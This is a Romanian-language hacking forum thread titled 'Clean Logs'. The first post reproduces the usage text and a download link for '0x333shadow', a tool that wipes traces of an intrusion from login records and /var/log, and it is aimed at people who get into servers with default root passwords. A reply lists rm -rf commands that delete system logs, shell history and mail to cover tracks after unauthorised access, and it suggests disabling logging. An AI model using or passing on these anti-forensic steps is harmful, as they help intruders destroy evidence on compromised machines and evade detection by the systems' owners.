Jump to content
wtfid

Clean Logs

Recommended Posts

In special pt copii care intra de pe "RDS-ul de acasa" pe root:123456


[~] 0x333shadow => hide your tracks version 0.1
[~] coded by nsn of outsiders ~ 0x333 Security Labs www.0x333.org [~]

Usage: ./0 [action] -i [string] -l [secs] -m [ dir1/file1 ] [ dir2/file2 ] [ ... ]

where action have to be:


-a clean all default dirs (recursive scan) you can use even -m. (include option -s, -.
-b clean only binary (utmp, wtmp, utmpx, wtmpx, lastlog) files.


other options:

-l clean after n secs, any system can log to logout, so you exit, and it try will clean (bg mode).
-m specify more dirs or text files (if you don't specify -a, -b, -s, default dirs and logs will be skipped ...
so only dirs/files specified will be cleaned).
-i string by search, choose it with sense
-s enable research other logs watching in syslogd newsyslog confs.
-h show this help.

other auto actions: read the DOCUMENTATION.
this tool watch in these directory by default:

/var/log
/var/adm
/usr/adm
/var/mail

correct use various example:

./0 -a -i string
./0 -b -i string -s
./0 -b -i string
./0 -a -i string -l 60
./0 -i string -m /var/log/messages

USE: ./0 -a -i IP

http://ulla.no/w/0

Link to comment
Share on other sites

Daca chiar ti-ai fi dorit sa afli cum sa iti stergi urmele dupa un sistem unde ai intrat, este/era de ajuns sa fi folosit google.

rm -rf /var/log/*.*

rm -rf /.bash.history

rm -rf /var/mail/*.*

Asta pentru inceput. Ar fi folositor sa cauti si cum poti da disable la orice fel de logging. Sunt N pagini cu asa ceva, nu iti trebuie un script special sa iti faca asta.

Daca nimic din ce am scris mai sus nu are sens pentru tine, avem o problema.

Fuck yea! Go berserk! Delete that shit....si unii "kids" se mai intreaba cum au fost prinsi!

Fara suparare, trebuie pusi la invatat pentru ca nu stiu sa faca diferenta intre debian, fedora, ubuntu, centOS,opensuse,arch etc.

Pentru cei care nu stiu ce face un script postat si pun intrebari care mai de care mai prostesti....documentati-va inainte sa deschideti gura!

Nici un cat la scanner-ul ssh care il folosesc nu stiu sa dea pentru a vedea ca root-urile prinse se trimit mail la altcineva, si totusi tupeul e in floare!

Invatati fratilor cum sa faceti scripturile si nu o sa va mai trebuiasca instructiuni cum sa folositi altele!

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...